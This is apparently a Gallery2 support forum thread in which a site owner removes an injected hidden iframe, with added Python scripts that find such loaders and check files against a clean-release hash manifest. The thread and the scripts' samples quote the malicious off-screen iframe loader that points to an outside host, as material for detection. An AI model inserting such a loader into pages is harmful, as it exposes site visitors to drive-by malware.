iframe virus removal [SOLVED]

ycc

Joined: 2008-08-18
Posts: 25
Posted: Sun, 2010-05-16 15:55

I am sorry I cannot provide all information asked for. My webhosting service has got iframe-injection problems and I cannot reach my site. I use Gallery2.

When I surf to my site, Avast antivirus says "permission denied due to iframe virus in main.php"

When I turn off Avast and save the main page, it starts like this (iframe virus included)

(I inserted some X to disable possible html interpretation.)

< X !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
< X html lang="en-US">< X head>< X script> X document.write('< X iframe src="http://hulmeux.com/?click=18790379" width=100 height=100 style="position:absolute;top:-10000;left:-10000;">< X /iframe>');< X /script>< X link rel="stylesheet" type="text/css" href="main.php_files/main.css">

However, when I download main.php with ftp, I cannot find the virus. I have tried searching for it, but I am not very good with Vista search functions. My impression is also that the virus may be hidden and not easy to search for.

Please tell me in which file the virus is located so I can correct it and upload. Or please give an alternative method for iframe virus removal.

Thanks
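
The question of which file actually carries the loader is one a small script answers faster than a desktop search. The following is an added example, not code from this thread or from the Gallery project: it walks a complete local download of the web root (fetched over SFTP or FTP) and reports every file containing the `document.write('<iframe ...></iframe>')` loader pasted above, with the line number and the iframe's src, and can strip that loader out of a file's contents. The regular expression, the list of file types scanned and the sample content are this example's own assumptions; the sample mirrors the poster's saved main.php with the "X" defanging removed.

```python
#!/usr/bin/env python3
"""Locate (and optionally strip) a hidden-iframe loader in a downloaded web root.
Usage:  python find_iframes.py /path/to/local/copy/of/site
Assumes the whole site has been downloaded to a local folder first."""
import os
import re
import sys

# File types worth scanning; the thread's hits were .php and .tpl files (assumption).
SCAN_SUFFIXES = (".php", ".phtml", ".html", ".htm", ".tpl", ".js")

# The loader seen in the thread: <script>document.write('<iframe ...></iframe>');</script>
INJECTED_LOADER = re.compile(
    r"""<script[^>]*>\s*document\.write\(\s*(?P<q>['"])"""
    r"""(?P<tag><iframe\b[^>]*>)\s*</iframe>"""
    r"""\s*(?P=q)\s*\)\s*;?\s*</script>""",
    re.IGNORECASE,
)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?(?P<src>[^"'\s>]+)""", re.IGNORECASE)
# Large negative top/left offsets push the frame out of the viewport.
OFFSCREEN = re.compile(r"\b(?:top|left)\s*:\s*-\d{3,}", re.IGNORECASE)


def find_injections(text):
    """One dict per loader in `text`: line number, iframe src, off-screen flag, matched text."""
    hits = []
    for m in INJECTED_LOADER.finditer(text):
        tag = m.group("tag")
        src = SRC_ATTR.search(tag)
        hits.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "src": src.group("src") if src else None,
            "offscreen": bool(OFFSCREEN.search(tag)),
            "match": m.group(0),
        })
    return hits


def strip_injections(text):
    """Return (cleaned_text, number_removed) with every matched loader deleted."""
    return INJECTED_LOADER.subn("", text)


def scan_tree(root):
    """Walk `root` and return {path: hits} for every scannable file that contains a loader."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                found[path] = hits
    return found


# Constructed sample: the poster's pasted main.php with the "X" defanging removed.
SAMPLE_INFECTED = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n'
    '<html lang="en-US"><head><script>document.write(\'<iframe '
    'src="http://hulmeux.com/?click=18790379" width=100 height=100 '
    'style="position:absolute;top:-10000;left:-10000;"></iframe>\');</script>'
    '<link rel="stylesheet" type="text/css" href="main.php_files/main.css">\n'
)
SAMPLE_CLEAN = '<html lang="en-US"><head><link rel="stylesheet" href="main.css">\n'


def demo_scan():
    """Write the constructed samples into a temporary tree and scan it; returns {relative_path: hits}."""
    import tempfile
    layout = {
        "main.php": SAMPLE_INFECTED,
        "lib/smarty/plugins/modifier.default.php": "<?php /* plugin */ ?>\n" + SAMPLE_INFECTED,
        "themes/matrix/templates/theme.tpl": SAMPLE_CLEAN,
        "readme.txt": SAMPLE_INFECTED,  # not a web file type, so it is skipped
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in layout.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.relpath(p, root).replace(os.sep, "/"): h
                for p, h in scan_tree(root).items()}


def main(argv):
    root = argv[1] if len(argv) > 1 else "."
    found = scan_tree(root)
    for path, hits in sorted(found.items()):
        for h in hits:
            where = "off-screen" if h["offscreen"] else "visible"
            print(f"{path}:{h['line']}: injected iframe -> {h['src']} ({where})")
    print(f"{len(found)} infected file(s) under {root}")
    return 1 if found else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a complete download, not only the pages the antivirus flags: the hit list later in this thread includes a Smarty plugin and a theme template, not just index and main files. Treat the strip function as first aid only; a loader that is base64- or hex-encoded, or wrapped differently, will not match this pattern, so a comparison of every file against a clean copy of the release remains the reliable check.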

 
suprsidr
suprsidr's picture

Joined: 2005-04-17
Posts: 8339
Posted: Sun, 2010-05-16 16:18
 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Sun, 2010-05-16 16:39

Thanks a million and a million more to suprsidr and this forum.

I followed the link posted:
http://www.example.com/gallery/upgrade/index.php

It gave six files as being modified; the one I had missed was in lib/smarty:

install/index.php
lib/smarty/plugins/modifier.default.php
lib/support/index.php
upgrade/index.php
modules/rewrite/data/path_info/index.php
themes/matrix/templates/theme.tpl

Now I can surf my site with antivirus program turned on.

No time to write more, must continue to read the FAQ ... ;)

Thread solved.
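
The upgrader's list of six modified files is what you get from comparing the installed files with what the release shipped. The script below is an added example, not the Gallery2 upgrader's own code, and does the same comparison for any web application: build a SHA-256 manifest from a clean, freshly downloaded copy of the same release, then check a download of the live site against it and report modified, missing and unexpected files. The manifest format, the ignore list and the constructed sample trees in `demo()` are this example's assumptions.

```python
#!/usr/bin/env python3
"""Check a downloaded web root against a SHA-256 manifest built from a clean release.

  python integrity.py build /path/to/clean/release        > manifest.txt
  python integrity.py check /path/to/downloaded/site manifest.txt
Manifest lines are "<sha256>  <relative/path>" (this example's own format).
"""
import hashlib
import os
import sys

# Paths that legitimately differ per site (assumed names); ignored, not flagged.
IGNORE_PREFIXES = ("config.php", "g2data/")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def walk_files(root):
    """Yield (relative posix path, absolute path) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            yield os.path.relpath(path, root).replace(os.sep, "/"), path


def build_manifest(root):
    return {rel: sha256_file(path) for rel, path in walk_files(root)}


def dump_manifest(manifest):
    return "".join(f"{digest}  {rel}\n" for rel, digest in sorted(manifest.items()))


def parse_manifest(text):
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            digest, _, rel = line.partition("  ")
            manifest[rel] = digest
    return manifest


def ignored(rel):
    return any(rel == p or rel.startswith(p) for p in IGNORE_PREFIXES)


def check_tree(root, manifest):
    """Report modified (hash differs), missing (in manifest, absent on disk) and
    unexpected (on disk, not in manifest: dropped files, renamed originals)."""
    present = {rel: path for rel, path in walk_files(root) if not ignored(rel)}
    return {
        "modified": sorted(r for r, p in present.items()
                           if r in manifest and sha256_file(p) != manifest[r]),
        "missing": sorted(r for r in manifest if r not in present and not ignored(r)),
        "unexpected": sorted(r for r in present if r not in manifest),
    }


def demo():
    """Constructed data: a clean release tree and a tampered deployment of it in
    temporary directories; returns check_tree()'s report for the deployment."""
    import tempfile
    loader = ("<script>document.write('<iframe src=\"http://hulmeux.com/?click=18790379\" "
              "style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>")
    clean = {
        "main.php": "<?php /* entry point */ ?>\n",
        "install/index.php": "<?php /* installer */ ?>\n",
        "lib/smarty/plugins/modifier.default.php": "<?php function smarty_modifier_default() {} ?>\n",
        "themes/matrix/templates/theme.tpl": "<html><head>{$head}</head></html>\n",
    }
    deployed = dict(clean)
    deployed["lib/smarty/plugins/modifier.default.php"] += loader  # loader appended
    deployed["themes/matrix/templates/theme.tpl"] = loader + clean["themes/matrix/templates/theme.tpl"]
    deployed["config.php"] = "<?php /* site-specific, ignored */ ?>\n"
    deployed["images/cache.php"] = "<?php /* never shipped with the release */ ?>\n"
    del deployed["install/index.php"]  # removed on this deployment, so reported missing
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        for root, files in ((a, clean), (b, deployed)):
            for rel, body in files.items():
                path = os.path.join(root, *rel.split("/"))
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(body)
        return check_tree(b, parse_manifest(dump_manifest(build_manifest(a))))


def main(argv):
    if len(argv) == 3 and argv[1] == "build":
        sys.stdout.write(dump_manifest(build_manifest(argv[2])))
        return 0
    if len(argv) == 4 and argv[1] == "check":
        with open(argv[3], encoding="utf-8") as fh:
            report = check_tree(argv[2], parse_manifest(fh.read()))
        for kind, paths in report.items():
            for rel in paths:
                print(f"{kind}: {rel}")
        return 1 if any(report.values()) else 0
    print(__doc__)
    return 2


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Build the manifest from a pristine release archive, never from the live site, or the injected files get blessed along with everything else. Unexpected files deserve as much attention as modified ones: whoever can write into modifier.default.php can also drop a new file with a plausible name, and the manifest is the only thing that will notice it. Paths that really are site-specific (config, data directory, uploads) belong in the ignore list rather than being waved through by hand each time.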

 
nivekiam
nivekiam's picture

Joined: 2002-12-10
Posts: 16504
Posted: Sun, 2010-05-16 21:16

CHANGE YOUR PASSWORDS. Most importantly the password you use for FTP and DO NOT USE FTP. Use SFTP. Using plain FTP means that your user name and password are sent in clear text and this is actually how a large majority of sites are hacked. NEVER use FTP or Telnet. SFTP (secure ftp) or SSH only, ever.

Also, make sure you are running the latest version of any software on your site, WordPress (known for many, many vulnerabilities and another major way sites get hacked), G2 (should be running 2.3.1), etc.

I'd read through this too:
http://codex.gallery2.org/Gallery2:How_do_I_secure_Gallery2

http://codex.gallery2.org/Gallery2:Security

A lot of that applies to any web based application you run on a site.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Mon, 2010-05-17 07:42

nivekiam

Thanks for suggestions.

I do not know if GoDaddy offers SFTP; I will have to check. I just have a rather simple "Linux deluxe hosting" account. (Not so advanced, in spite of its name, but price and service are OK. No SSH, though.)

 
nivekiam
nivekiam's picture

Joined: 2002-12-10
Posts: 16504
Posted: Mon, 2010-05-17 14:13

GoDaddy sucks. They run really old software on their servers (Apache 1.x for example) with no apparent plans on upgrading. If they don't offer secure access like SFTP at the very least then it shows even more how little they care about security or their customers and all they care about is getting a monthly payment from them.

www.pairlite.com A little bit more per month but way better service. I have other suggestions too.

 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Thu, 2010-05-20 10:14

The suggestion to tighten up the file transfer procedures is naturally a good one, thanks.

How the iframes got injected this time I am not sure about. However, during one short period iframes were written into many files at my hosting account. (Mostly by the name of index.htm, index.php and some files with "main" in their name.) I wrote and complained to the hosting company and got general antivirus guidelines back.

The problem then suddenly disappeared and I could gradually remove the iframes. (The last one by help in this thread.) At that time I hadn't yet changed my ftp password. My impression was that someone working at the hosting company (or otherwise having the right to run executables) had been infected by an executable program that wrote iframes into indexfiles. They then took care of the problem and it has fortunately not reappeared.